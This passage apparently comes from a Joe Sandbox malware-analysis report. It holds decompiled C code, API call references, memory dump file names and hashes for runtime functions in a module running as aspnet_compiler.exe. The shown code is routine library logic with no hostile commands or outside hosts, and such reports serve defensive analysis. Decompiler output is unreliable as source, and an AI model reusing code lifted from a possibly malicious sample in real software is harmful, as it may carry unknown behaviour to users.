                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 10004C1D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                  • API String ID: 2506810119-572611079
                                                                                                                                                                                                                                                                  • Opcode ID: c1bfaf7520cd27f418e69ea9f47509fb50252ee0e6ba6d9fd289fe62025ff592
                                                                                                                                                                                                                                                                  • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1bfaf7520cd27f418e69ea9f47509fb50252ee0e6ba6d9fd289fe62025ff592
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                                                                                                  			E100086E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				int _v12;
                                                                                                                                                                                                                                                                  				char _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* _v40;
                                                                                                                                                                                                                                                                  				signed int _t34;
                                                                                                                                                                                                                                                                  				signed int _t40;
                                                                                                                                                                                                                                                                  				int _t46;
                                                                                                                                                                                                                                                                  				int _t53;
                                                                                                                                                                                                                                                                  				void* _t55;
                                                                                                                                                                                                                                                                  				int _t57;
                                                                                                                                                                                                                                                                  				signed int _t63;
                                                                                                                                                                                                                                                                  				int _t67;
                                                                                                                                                                                                                                                                  				short* _t69;
                                                                                                                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                                                                                                                  				short* _t71;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t34 =  *0x10013014; // 0xf4aa7632
                                                                                                                                                                                                                                                                  				_v8 = _t34 ^ _t70;
                                                                                                                                                                                                                                                                  				E100054A7(__ebx,  &_v28, __edx, _a4);
                                                                                                                                                                                                                                                                  				_t57 = _a24;
                                                                                                                                                                                                                                                                  				if(_t57 == 0) {
                                                                                                                                                                                                                                                                  					_t53 =  *(_v24 + 8);
                                                                                                                                                                                                                                                                  					_t57 = _t53;
                                                                                                                                                                                                                                                                  					_a24 = _t53;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t67 = 0;
                                                                                                                                                                                                                                                                  				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                                                                                  				_v12 = _t40;
                                                                                                                                                                                                                                                                  				if(_t40 == 0) {
                                                                                                                                                                                                                                                                  					L15:
                                                                                                                                                                                                                                                                  					if(_v16 != 0) {
                                                                                                                                                                                                                                                                  						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return E10002ADA(_v8 ^ _t70);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t55 = _t40 + _t40;
                                                                                                                                                                                                                                                                  				_t17 = _t55 + 8; // 0x8
                                                                                                                                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  				if((_t17 & _t40) == 0) {
                                                                                                                                                                                                                                                                  					_t69 = 0;
                                                                                                                                                                                                                                                                  					L11:
                                                                                                                                                                                                                                                                  					if(_t69 != 0) {
                                                                                                                                                                                                                                                                  						E10002C40(_t67, _t69, _t67, _t55);
                                                                                                                                                                                                                                                                  						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                                                                                                                                                  						if(_t46 != 0) {
                                                                                                                                                                                                                                                                  							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L14:
                                                                                                                                                                                                                                                                  					E10008801(_t69);
                                                                                                                                                                                                                                                                  					goto L15;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t20 = _t55 + 8; // 0x8
                                                                                                                                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  				_t48 = _t40 & _t20;
                                                                                                                                                                                                                                                                  				_t21 = _t55 + 8; // 0x8
                                                                                                                                                                                                                                                                  				_t63 = _t21;
                                                                                                                                                                                                                                                                  				if((_t40 & _t20) > 0x400) {
                                                                                                                                                                                                                                                                  					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  					_t69 = E100056D0(_t63, _t48 & _t63);
                                                                                                                                                                                                                                                                  					if(_t69 == 0) {
                                                                                                                                                                                                                                                                  						goto L14;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					 *_t69 = 0xdddd;
                                                                                                                                                                                                                                                                  					L9:
                                                                                                                                                                                                                                                                  					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  				0x1000bf20();
                                                                                                                                                                                                                                                                  				_t69 = _t71;
                                                                                                                                                                                                                                                                  				if(_t69 == 0) {
                                                                                                                                                                                                                                                                  					goto L14;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                                  				goto L9;
                                                                                                                                                                                                                                                                  			}




















                                                                                                                                                                                                                                                                  0x100086ec
                                                                                                                                                                                                                                                                  0x100086f3
                                                                                                                                                                                                                                                                  0x100086ff
                                                                                                                                                                                                                                                                  0x10008704
                                                                                                                                                                                                                                                                  0x10008709
                                                                                                                                                                                                                                                                  0x1000870e
                                                                                                                                                                                                                                                                  0x10008711
                                                                                                                                                                                                                                                                  0x10008713
                                                                                                                                                                                                                                                                  0x10008713
                                                                                                                                                                                                                                                                  0x10008718
                                                                                                                                                                                                                                                                  0x10008731
                                                                                                                                                                                                                                                                  0x10008737
                                                                                                                                                                                                                                                                  0x1000873c
                                                                                                                                                                                                                                                                  0x100087db
                                                                                                                                                                                                                                                                  0x100087df
                                                                                                                                                                                                                                                                  0x100087e4
                                                                                                                                                                                                                                                                  0x100087e4
                                                                                                                                                                                                                                                                  0x10008800
                                                                                                                                                                                                                                                                  0x10008800
                                                                                                                                                                                                                                                                  0x10008742
                                                                                                                                                                                                                                                                  0x10008745
                                                                                                                                                                                                                                                                  0x1000874a
                                                                                                                                                                                                                                                                  0x1000874e
                                                                                                                                                                                                                                                                  0x1000879a
                                                                                                                                                                                                                                                                  0x1000879c
                                                                                                                                                                                                                                                                  0x1000879e
                                                                                                                                                                                                                                                                  0x100087a3
                                                                                                                                                                                                                                                                  0x100087ba
                                                                                                                                                                                                                                                                  0x100087c2
                                                                                                                                                                                                                                                                  0x100087d2
                                                                                                                                                                                                                                                                  0x100087d2
                                                                                                                                                                                                                                                                  0x100087c2
                                                                                                                                                                                                                                                                  0x100087d4
                                                                                                                                                                                                                                                                  0x100087d5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x100087da
                                                                                                                                                                                                                                                                  0x10008750
                                                                                                                                                                                                                                                                  0x10008755
                                                                                                                                                                                                                                                                  0x10008757
                                                                                                                                                                                                                                                                  0x10008759
                                                                                                                                                                                                                                                                  0x10008759
                                                                                                                                                                                                                                                                  0x10008761
                                                                                                                                                                                                                                                                  0x1000877e
                                                                                                                                                                                                                                                                  0x10008788
                                                                                                                                                                                                                                                                  0x1000878d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x1000878f
                                                                                                                                                                                                                                                                  0x10008795
                                                                                                                                                                                                                                                                  0x10008795
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008795
                                                                                                                                                                                                                                                                  0x10008765
                                                                                                                                                                                                                                                                  0x10008769
                                                                                                                                                                                                                                                                  0x1000876e
                                                                                                                                                                                                                                                                  0x10008772
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10008774
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 100087D5
                                                                                                                                                                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                                                  • Opcode ID: 08f8a4e47431da36305d4b59638c7e07313009367c7662a2e3dfd12eefaf61fe
                                                                                                                                                                                                                                                                  • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08f8a4e47431da36305d4b59638c7e07313009367c7662a2e3dfd12eefaf61fe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                                                                                                                                                  			E10005CE1(signed int _a4) {
                                                                                                                                                                                                                                                                  				signed int _t9;
                                                                                                                                                                                                                                                                  				void* _t13;
                                                                                                                                                                                                                                                                  				signed int _t15;
                                                                                                                                                                                                                                                                  				WCHAR* _t22;
                                                                                                                                                                                                                                                                  				signed int _t24;
                                                                                                                                                                                                                                                                  				signed int* _t25;
                                                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t9 = _a4;
                                                                                                                                                                                                                                                                  				_t25 = 0x10013e80 + _t9 * 4;
                                                                                                                                                                                                                                                                  				_t24 =  *_t25;
                                                                                                                                                                                                                                                                  				if(_t24 == 0) {
                                                                                                                                                                                                                                                                  					_t22 =  *(0x1000dc10 + _t9 * 4);
                                                                                                                                                                                                                                                                  					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                                  					if(_t27 != 0) {
                                                                                                                                                                                                                                                                  						L8:
                                                                                                                                                                                                                                                                  						 *_t25 = _t27;
                                                                                                                                                                                                                                                                  						if( *_t25 != 0) {
                                                                                                                                                                                                                                                                  							FreeLibrary(_t27);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t13 = _t27;
                                                                                                                                                                                                                                                                  						L11:
                                                                                                                                                                                                                                                                  						return _t13;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t15 = GetLastError();
                                                                                                                                                                                                                                                                  					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                                  						_t27 = 0;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                                  						_t27 = _t15;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_t27 != 0) {
                                                                                                                                                                                                                                                                  						goto L8;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                                  						_t13 = 0;
                                                                                                                                                                                                                                                                  						goto L11;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t4 = _t24 + 1; // 0xf4aa7633
                                                                                                                                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                  				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x10005ce6
                                                                                                                                                                                                                                                                  0x10005cea
                                                                                                                                                                                                                                                                  0x10005cf1
                                                                                                                                                                                                                                                                  0x10005cf5
                                                                                                                                                                                                                                                                  0x10005d03
                                                                                                                                                                                                                                                                  0x10005d19
                                                                                                                                                                                                                                                                  0x10005d1d
                                                                                                                                                                                                                                                                  0x10005d46
                                                                                                                                                                                                                                                                  0x10005d48
                                                                                                                                                                                                                                                                  0x10005d4c
                                                                                                                                                                                                                                                                  0x10005d4f
                                                                                                                                                                                                                                                                  0x10005d4f
                                                                                                                                                                                                                                                                  0x10005d55
                                                                                                                                                                                                                                                                  0x10005d57
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005d58
                                                                                                                                                                                                                                                                  0x10005d1f
                                                                                                                                                                                                                                                                  0x10005d28
                                                                                                                                                                                                                                                                  0x10005d37
                                                                                                                                                                                                                                                                  0x10005d2a
                                                                                                                                                                                                                                                                  0x10005d2d
                                                                                                                                                                                                                                                                  0x10005d33
                                                                                                                                                                                                                                                                  0x10005d33
                                                                                                                                                                                                                                                                  0x10005d3b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005d3d
                                                                                                                                                                                                                                                                  0x10005d40
                                                                                                                                                                                                                                                                  0x10005d42
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x10005d42
                                                                                                                                                                                                                                                                  0x10005d3b
                                                                                                                                                                                                                                                                  0x10005cf7
                                                                                                                                                                                                                                                                  0x10005cfc
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.535447189.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535396742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.535717479.0000000010009000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536002654.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.536051081.0000000010017000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                  • Opcode ID: 91eab6032b338b7532db891a6aa337afefa85c754e7afb8b71f85ebaeeb44871
                                                                                                                                                                                                                                                                  • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91eab6032b338b7532db891a6aa337afefa85c754e7afb8b71f85ebaeeb44871
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                                                                                                                  			E100063F0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v0;
                                                                                                                                                                                                                                                                  				char _v6;
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				signed int _v36;
                                                                                                                                                                                                                                                                  				intOrPtr* _v64;
                                                                                                                                                                                                                                                                  				intOrPtr _v96;
                                                                                                                                                                                                                                                                  				intOrPtr* _v100;
                                                                                                                                                                                                                                                                  				CHAR* _v104;
                                                                                                                                                                                                                                                                  				signed int _v116;
                                                                                                                                                                                                                                                                  				char _v290;
                                                                                                                                                                                                                                                                  				signed int _v291;
                                                                                                                                                                                                                                                                  				char _v292;
                                                                                                                                                                                                                                                                  				void _v336;
                                                                                                                                                                                                                                                                  				union _FINDEX_INFO_LEVELS _v340;
                                                                                                                                                                                                                                                                  				signed int _v344;
                                                                                                                                                                                                                                                                  				signed int _v348;
                                                                                                                                                                                                                                                                  				intOrPtr _v440;
                                                                                                                                                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                                                                                                                                                  				signed int _t82;
                                                                                                                                                                                                                                                                  				signed int _t87;
                                                                                                                                                                                                                                                                  				signed int _t91;
                                                                                                                                                                                                                                                                  				signed int _t93;
                                                                                                                                                                                                                                                                  				signed int _t95;
                                                                                                                                                                                                                                                                  				signed int _t96;
                                                                                                                                                                                                                                                                  				signed int _t100;
                                                                                                                                                                                                                                                                  				signed int _t103;
                                                                                                                                                                                                                                                                  				signed int _t108;
                                                                                                                                                                                                                                                                  				signed int _t111;
                                                                                                                                                                                                                                                                  				intOrPtr _t113;
                                                                                                                                                                                                                                                                  				signed char _t115;
                                                                                                                                                                                                                                                                  				union _FINDEX_INFO_LEVELS _t123;
                                                                                                                                                                                                                                                                  				signed int _t128;
                                                                                                                                                                                                                                                                  				signed int _t131;
                                                                                                                                                                                                                                                                  				void* _t137;
                                                                                                                                                                                                                                                                  				void* _t139;
                                                                                                                                                                                                                                                                  				signed int _t140;
                                                                                                                                                                                                                                                                  				signed int _t143;
                                                                                                                                                                                                                                                                  				signed int _t145;
                                                                                                                                                                                                                                                                  				signed int _t147;
                                                                                                                                                                                                                                                                  				signed int* _t148;
                                                                                                                                                                                                                                                                  				signed int _t151;
                                                                                                                                                                                                                                                                  				void* _t154;
                                                                                                                                                                                                                                                                  				CHAR* _t155;
                                                                                                                                                                                                                                                                  				char _t158;
                                                                                                                                                                                                                                                                  				char _t160;
                                                                                                                                                                                                                                                                  				intOrPtr* _t163;
                                                                                                                                                                                                                                                                  				void* _t164;
                                                                                                                                                                                                                                                                  				intOrPtr* _t165;
                                                                                                                                                                                                                                                                  				signed int _t167;
                                                                                                                                                                                                                                                                  				void* _t169;
                                                                                                                                                                                                                                                                  				intOrPtr* _t170;
                                                                                                                                                                                                                                                                  				signed int _t174;
                                                                                                                                                                                                                                                                  				signed int _t178;
                                                                                                                                                                                                                                                                  				signed int _t179;
                                                                                                                                                                                                                                                                  				intOrPtr* _t184;
                                                                                                                                                                                                                                                                  				void* _t193;
                                                                                                                                                                                                                                                                  				intOrPtr _t194;
                                                                                                                                                                                                                                                                  				signed int _t196;
                                                                                                                                                                                                                                                                  				signed int _t197;
                                                                                                                                                                                                                                                                  				signed int _t199;
                                                                                                                                                                                                                                                                  				signed int _t200;
                                                                                                                                                                                                                                                                  				signed int _t202;
                                                                                                                                                                                                                                                                  				union _FINDEX_INFO_LEVELS _t203;
                                                                                                                                                                                                                                                                  				signed int _t208;
                                                                                                                                                                                                                                                                  				signed int _t210;
                                                                                                                                                                                                                                                                  				signed int _t211;
                                                                                                                                                                                                                                                                  				void* _t213;
                                                                                                                                                                                                                                                                  				intOrPtr _t214;
                                                                                                                                                                                                                                                                  				void* _t215;
                                                                                                                                                                                                                                                                  				signed int _t219;
                                                                                                                                                                                                                                                                  				void* _t221;
                                                                                                                                                                                                                                                                  				signed int _t222;
                                                                                                                                                                                                                                                                  				void* _t223;
                                                                                                                                                                                                                                                                  				void* _t224;
                                                                                                                                                                                                                                                                  				void* _t225;
                                                                                                                                                                                                                                                                  				signed int _t226;
                                                                                                                                                                                                                                                                  				void* _t227;
                                                                                                                                                                                                                                                                  				void* _t228;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t80 = _a8;
                                                                                                                                                                                                                                                                  				_t224 = _t223 - 0x20;
                                                                                                                                                                                                                                                                  				if(_t80 != 0) {
                                                                                                                                                                                                                                                                  					_t208 = _a4;
                                                                                                                                                                                                                                                                  					_t160 = 0;
                                                                                                                                                                                                                                                                  					 *_t80 = 0;
                                                                                                                                                                                                                                                                  					_t199 = 0;
                                                                                                                                                                                                                                                                  					_t151 = 0;
                                                                                                                                                                                                                                                                  					_v36 = 0;
                                                                                                                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                                                                                                                  					_v28 = 0;
                                                                                                                                                                                                                                                                  					__eflags =  *_t208;
                                                                                                                                                                                                                                                                  					if( *_t208 == 0) {
                                                                                                                                                                                                                                                                  						L9:
                                                                                                                                                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                  						_t82 = _t151 - _t199;
                                                                                                                                                                                                                                                                  						_v8 = _t160;
                                                                                                                                                                                                                                                                  						_t191 = (_t82 >> 2) + 1;
                                                                                                                                                                                                                                                                  						__eflags = _t151 - _t199;
                                                                                                                                                                                                                                                                  						_v16 = (_t82 >> 2) + 1;
                                                                                                                                                                                                                                                                  						asm("sbb esi, esi");
                                                                                                                                                                                                                                                                  						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                                                                                                                                                                                                                                                                  						__eflags = _t210;
                                                                                                                                                                                                                                                                  						if(_t210 != 0) {
                                                                                                                                                                                                                                                                  							_t197 = _t199;
                                                                                                                                                                                                                                                                  							_t158 = _t160;
                                                                                                                                                                                                                                                                  							do {
                                                                                                                                                                                                                                                                  								_t184 =  *_t197;
                                                                                                                                                                                                                                                                  								_t17 = _t184 + 1; // 0x1
                                                                                                                                                                                                                                                                  								_v8 = _t17;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									_t143 =  *_t184;
                                                                                                                                                                                                                                                                  									_t184 = _t184 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t143;
                                                                                                                                                                                                                                                                  								} while (_t143 != 0);
                                                                                                                                                                                                                                                                  								_t158 = _t158 + 1 + _t184 - _v8;
                                                                                                                                                                                                                                                                  								_t197 = _t197 + 4;
                                                                                                                                                                                                                                                                  								_t145 = _v12 + 1;
                                                                                                                                                                                                                                                                  								_v12 = _t145;
                                                                                                                                                                                                                                                                  								__eflags = _t145 - _t210;
                                                                                                                                                                                                                                                                  							} while (_t145 != _t210);
                                                                                                                                                                                                                                                                  							_t191 = _v16;
                                                                                                                                                                                                                                                                  							_v8 = _t158;
                                                                                                                                                                                                                                                                  							_t151 = _v32;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t211 = E10004E76(_t191, _v8, 1);
                                                                                                                                                                                                                                                                  						_t225 = _t224 + 0xc;
                                                                                                                                                                                                                                                                  						__eflags = _t211;
                                                                                                                                                                                                                                                                  						if(_t211 != 0) {
                                                                                                                                                                                                                                                                  							_t87 = _t211 + _v16 * 4;
                                                                                                                                                                                                                                                                  							_v20 = _t87;
                                                                                                                                                                                                                                                                  							_t192 = _t87;
                                                                                                                                                                                                                                                                  							_v16 = _t87;
                                                                                                                                                                                                                                                                  							__eflags = _t199 - _t151;
                                                                                                                                                                                                                                                                  							if(_t199 == _t151) {
                                                                                                                                                                                                                                                                  								L23:
                                                                                                                                                                                                                                                                  								_t200 = 0;
                                                                                                                                                                                                                                                                  								__eflags = 0;
                                                                                                                                                                                                                                                                  								 *_a8 = _t211;
                                                                                                                                                                                                                                                                  								goto L24;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_t93 = _t211 - _t199;
                                                                                                                                                                                                                                                                  								__eflags = _t93;
                                                                                                                                                                                                                                                                  								_v24 = _t93;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									_t163 =  *_t199;
                                                                                                                                                                                                                                                                  									_v12 = _t163 + 1;
                                                                                                                                                                                                                                                                  									do {
                                                                                                                                                                                                                                                                  										_t95 =  *_t163;
                                                                                                                                                                                                                                                                  										_t163 = _t163 + 1;
                                                                                                                                                                                                                                                                  										__eflags = _t95;
                                                                                                                                                                                                                                                                  									} while (_t95 != 0);
                                                                                                                                                                                                                                                                  									_t164 = _t163 - _v12;
                                                                                                                                                                                                                                                                  									_t35 = _t164 + 1; // 0x1
                                                                                                                                                                                                                                                                  									_t96 = _t35;
                                                                                                                                                                                                                                                                  									_push(_t96);
                                                                                                                                                                                                                                                                  									_v12 = _t96;
                                                                                                                                                                                                                                                                  									_t100 = E100085EB(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                                                                                                                                                                                                                                                                  									_t225 = _t225 + 0x10;
                                                                                                                                                                                                                                                                  									__eflags = _t100;
                                                                                                                                                                                                                                                                  									if(_t100 != 0) {
                                                                                                                                                                                                                                                                  										_push(0);
                                                                                                                                                                                                                                                                  										_push(0);
                                                                                                                                                                                                                                                                  										_push(0);
                                                                                                                                                                                                                                                                  										_push(0);
                                                                                                                                                                                                                                                                  										_push(0);
                                                                                                                                                                                                                                                                  										E100062BC(0);
                                                                                                                                                                                                                                                                  										asm("int3");
                                                                                                                                                                                                                                                                  										_t221 = _t225;
                                                                                                                                                                                                                                                                  										_push(_t164);
                                                                                                                                                                                                                                                                  										_t165 = _v64;
                                                                                                                                                                                                                                                                  										_t47 = _t165 + 1; // 0x1
                                                                                                                                                                                                                                                                  										_t193 = _t47;
                                                                                                                                                                                                                                                                  										do {
                                                                                                                                                                                                                                                                  											_t103 =  *_t165;
                                                                                                                                                                                                                                                                  											_t165 = _t165 + 1;
                                                                                                                                                                                                                                                                  											__eflags = _t103;
                                                                                                                                                                                                                                                                  										} while (_t103 != 0);
